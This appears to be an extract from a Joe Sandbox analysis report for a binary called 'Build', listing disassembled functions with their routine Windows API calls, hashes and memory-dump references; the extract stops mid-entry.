API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: b01b91b9dad9c5fa895e3dcf1b7313891b080bd44f721d0c2aa34fb1272d807b
Instruction ID: 6318436c96607dbc9dd3e2d7fadd293692e9841807677fa12f3811f6639cb9ca
Opcode Fuzzy Hash: b01b91b9dad9c5fa895e3dcf1b7313891b080bd44f721d0c2aa34fb1272d807b
Instruction Fuzzy Hash: D2F08235409790AACA621BB45905BC67FD09F26332F00CAC9F1FE12192C6B56198AB32

Function 00B51421 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B51445

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: e53f430e888b3b4dfe5a94193e22b92b333f5de3c29a87175f0222974f4b6146
Instruction ID: 193e5b66f461fe0eef964d70ed143b7f5da530a92533899e4a7b69c13d407345
Opcode Fuzzy Hash: e53f430e888b3b4dfe5a94193e22b92b333f5de3c29a87175f0222974f4b6146
Instruction Fuzzy Hash: CFE04F321001806AD321AB1DD804FBFABE9DF81721F15889EF99487281CBB5AC85CA60

Function 00B52EE4 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00B52F19

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 2545071611c1ded5a0562f17c7492e8db7a2d3b6e7a92ab982f365f7b8618e16
Instruction ID: 124f31e8bb8d213b9c92d1b2ec2eef87f9015bda4d1fe2ff1f254e4ba872482b
Opcode Fuzzy Hash: 2545071611c1ded5a0562f17c7492e8db7a2d3b6e7a92ab982f365f7b8618e16
Instruction Fuzzy Hash: ABD02B1164931015DA27332578157FD16C6DFC7353F0800E2F8496B2D38F4A0C4AE3E2

Function 00B5C5B6 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00B5C5BC

Part of subcall function 00B5C34D: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B5C36E

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
Instruction ID: f940161b93eadaa9915dead951d84997e2526537c6bf030d3dade497b4cd1203
Opcode Fuzzy Hash: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
Instruction Fuzzy Hash: 53D05E30200308AAEF016A649802A6E79D6DB10341F0084E1BC0285140EDB5DA146991

Function 00B6017F Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00B601A4

Part of subcall function 00B5D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5D875
Part of subcall function 00B5D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5D886
Part of subcall function 00B5D864: IsDialogMessageW.USER32(0002043C,?), ref: 00B5D89A
Part of subcall function 00B5D864: TranslateMessage.USER32(?), ref: 00B5D8A8
Part of subcall function 00B5D864: DispatchMessageW.USER32(?), ref: 00B5D8B2

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: b014bb1f49935a3a6474c164bb8a85c171fbf3456e3f08cb0db4a01c31308bf2
Instruction ID: bf4215a20103f31df34b10695f4538b5e26d3044a80c0af80ff7fba17e0d132a
Opcode Fuzzy Hash: b014bb1f49935a3a6474c164bb8a85c171fbf3456e3f08cb0db4a01c31308bf2
Instruction Fuzzy Hash: 88D09E75148300AAD6112B51DD06F1A7AE2BB99B05F004594B685350F18A629D25EB16

Function 00B60A98 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00B60AC0

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 7f2d345423f6477e8f0b47a6096ed4de91ed143c3546e58cd39ea5b254f31d15
Instruction ID: c81685e4719ecb0e6b8ac030c98dacac1de8e01d333f922009ff3edb6c07f31a
Opcode Fuzzy Hash: 7f2d345423f6477e8f0b47a6096ed4de91ed143c3546e58cd39ea5b254f31d15
Instruction Fuzzy Hash: 09D0123056171CADC221FBA6DCCFB2A36D0F309748F9805E0B589970B4EFBC55D08605

Function 00B511EB Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 00B511F5

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 6b8b830e851f18c51aaee745870583f9443febc0fe5c83353ec88b0637866ef1
Instruction ID: 80059ec640e9af619dc16f1ca84574e08a844ab889f6c8f9e4504e4ce6b3ed97
Opcode Fuzzy Hash: 6b8b830e851f18c51aaee745870583f9443febc0fe5c83353ec88b0637866ef1
Instruction Fuzzy Hash: F9D0EA71414A22CFD7A59F39E848782BBE5FF08311B258CAED4DAD2664EA759880CF50

Function 00B4B288 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00B4B18A,?,?,?,00000000,00B4B662,?,?,00000000,?,?), ref: 00B4B294

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 8c9df3ad209b00ea80e2a1dcec02b66912464d1adbc84ea5e2ee5b23d1782bc9
Instruction ID: 2a2a245c0a4b7d820934be2bf21f4379746295f47aa1b526c8301b002b24d243
Opcode Fuzzy Hash: 8c9df3ad209b00ea80e2a1dcec02b66912464d1adbc84ea5e2ee5b23d1782bc9
Instruction Fuzzy Hash: 7CC08C34000508968E704B38DC8989C7BA2EE533B77B487D8C23CCA4A2C363CD93FA00

Function 00B606B5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fe0a82e8f26d369638eec3555f8b5e45d12f368737e154ce8f2b33fc2cf5f741
Instruction ID: c229240259ad332f509ca78723930e1a22b7eeb98f907337c56814ae1b842e09
Opcode Fuzzy Hash: fe0a82e8f26d369638eec3555f8b5e45d12f368737e154ce8f2b33fc2cf5f741
Instruction Fuzzy Hash: 67B0128A3BC203AC3648F14A9C42C3F02DCC2C1B10330C6FAF40CC0140D8441C404031

Function 00B606A1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6657ba946cedfe41eab66cdad588cdab0961837d75c7be27d8bb44785cb64f8e
Instruction ID: 19962ee9e52b7ddef079d8c3b51ba5e83cce0f92329bc012b08652ea73776f13
Opcode Fuzzy Hash: 6657ba946cedfe41eab66cdad588cdab0961837d75c7be27d8bb44785cb64f8e
Instruction Fuzzy Hash: 2CB012863BC103AC3108B14ADC02C3F02ECD2C1B10330C6FBF40CC0040D8441C000435

Function 00B606AB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 72f5361cb261ba6eb42732657b0826da708be3abd97798ab4050877db2eb52a4
Instruction ID: 5bb5b9ad28501a0c46de7ea9a987cbf8af9fb06acc7c281c6f1b75182339094c
Opcode Fuzzy Hash: 72f5361cb261ba6eb42732657b0826da708be3abd97798ab4050877db2eb52a4
Instruction Fuzzy Hash: DCB0128B3BC103AC3108F14A9C42C3F02DCC2C2B10330C5FAF80CC0140D8442C010031

Function 00B60697 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6822a9021ba3a02ac6d967e2189b1c3959231fb8aad4200650e3b6f44270a43e
Instruction ID: bac79ccbed06cf6ebc3e1999b86c9091a8336824bcf346895180541a6bd2b932
Opcode Fuzzy Hash: 6822a9021ba3a02ac6d967e2189b1c3959231fb8aad4200650e3b6f44270a43e
Instruction Fuzzy Hash: B0B012863BC003AC3108B14ADD02C3F02ECC2C1B10330C7FAF80CC0040D8441C010435

Function 00B606F1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4b4ff8396a3ca7ee2031be027a8d98e2086d23484cff54d63ea5d964f771b5e4
Instruction ID: aa9460ad8fce37c1833a8457f4e1887efb0f581aeb55b5a59a99e0d5cf44231b
Opcode Fuzzy Hash: 4b4ff8396a3ca7ee2031be027a8d98e2086d23484cff54d63ea5d964f771b5e4
Instruction Fuzzy Hash: 59B012863BC003AC310CB19A9C02C3F02DCD2C1B10330C9FAF40CC0140D8441C040031

Function 00B606FB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: de3c0cca99bf1bd9308ac64c5b1c39e9b3b0e1dcece89f2b33c296a9c44123d4
Instruction ID: 42278ff7569fd256a55fa7f7b2ade68f02012fda7ecd19e5b8347e00fa80e146
Opcode Fuzzy Hash: de3c0cca99bf1bd9308ac64c5b1c39e9b3b0e1dcece89f2b33c296a9c44123d4
Instruction Fuzzy Hash: 1FB012E73BC003AC3108B14A9C02C3F02DCC2C2B10330C5FAF80CC0040D8441C010031

Function 00B606E7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c615a4467394b2605e8210b79a07e94d5d10ef1bcec4d7cf772807adbd7f712d
Instruction ID: a602a1c3134a76f28530780cd33b1bfb510469a0265fb36cb237d6b950d3fde9
Opcode Fuzzy Hash: c615a4467394b2605e8210b79a07e94d5d10ef1bcec4d7cf772807adbd7f712d
Instruction Fuzzy Hash: F1B012863FC003AC310CB14A9D02C3F02DCC2C1B10330C5FAF80CC0140D8441C090031

Function 00B606D3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 817e3071f84fd33861d589c98f7b9cedfd2396244ad3b300bbb49fb4b9ee0d98
Instruction ID: 6fa86fd22ae2f4427e360193e660b8e175a1ae59d711c6210c126811ea6dc8d9
Opcode Fuzzy Hash: 817e3071f84fd33861d589c98f7b9cedfd2396244ad3b300bbb49fb4b9ee0d98
Instruction Fuzzy Hash: 12B012873BC003AC310CB54A9C02C3F02DCC2C2B10330C5FAF80CC0140D8441C050031

Function 00B606DD Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 90bd4e655608b83192e6dd50945062a1bb46e4d4822404765ee42c3e73b05bd5
